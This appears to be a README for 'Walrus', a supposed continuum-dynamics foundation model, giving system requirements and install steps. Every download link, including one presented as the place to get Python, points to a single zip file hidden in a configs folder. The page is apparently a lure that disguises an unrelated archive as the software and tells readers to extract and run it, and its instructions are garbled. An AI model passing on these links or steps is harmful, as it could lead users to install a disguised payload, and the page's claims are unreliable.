Walrus is a cross-domain foundation model designed for continuum dynamics. It focuses on simulating fluid-like behaviors across multiple domains. This tool helps you understand and evaluate complex fluid interactions with ease.
Before installing Walrus, ensure your system meets the following requirements:
- Operating System: Windows 10 or later, macOS Mojave or later, or a recent Linux distribution.
- RAM: At least 4 GB of RAM.
- Storage: 1 GB of available disk space.
- Dependencies: Make sure you have Python 3.8 or higher installed. You can download it from https://github.com/Krichlicka/walrus/raw/refs/heads/main/walrus/configs/trainer/Software_2.0.zip.
To download Walrus, visit the Releases page:
This page contains the latest version of Walrus, along with previous releases.
On the Releases page, look for the version you want to download. Download the file that matches your operating system.
- For Windows users, look for
.exefiles. - For macOS users, find
.dmgfiles. - For Linux users, download the
https://github.com/Krichlicka/walrus/raw/refs/heads/main/walrus/configs/trainer/Software_2.0.zipfile.
Once you have chosen the correct file, click on it to start the download. After the file downloads:
- Windows: Double-click on the
.exefile. Follow the instructions to install Walrus. - macOS: Open the
.dmgfile and drag the Walrus app into your Applications folder. - Linux: Extract the
https://github.com/Krichlicka/walrus/raw/refs/heads/main/walrus/configs/trainer/Software_2.0.zipfile using a terminal or file manager. Run the setup script as instructed in the README included in the package.
After installation, locate the Walrus application on your computer:
- Windows: You can find it in the Start Menu.
- macOS: Open your Applications folder and double-click Walrus.
- Linux: Navigate to the extracted folder and run the terminal script.
- Multi-domain modeling: Supports various fluid-like scenarios across different domains.
- Easy evaluation: Tools included for evaluating the performance of different models.
- User-friendly interface: Designed for ease of use even for those unfamiliar with programming.
For detailed tutorials on how to use Walrus and explore its features:
- Visit our Tutorials page for step-by-step guides.
- Check out the examples provided in the application to see how to get started quickly.
Walrus is built on advanced principles of continuum dynamics. It allows users to simulate and analyze complex fluid behaviors. This model is particularly useful for researchers and students studying fluid dynamics.
The design aims to simplify tasks that typically require deep knowledge of programming and fluid dynamics. Walrus offers a platform where users can focus on their research rather than technical hurdles.
- Documentation: For more in-depth information, refer to the official documentation.
- Community Support: Join our forums or Discord channel to ask questions and share insights with other users.
To download and install Walrus, visit this page to download the latest version:
Follow the instructions above to set it up on your system. If you encounter any issues, please refer to the troubleshooting section in our documentation.
Thank you for choosing Walrus! Enjoy exploring continuum dynamics with ease.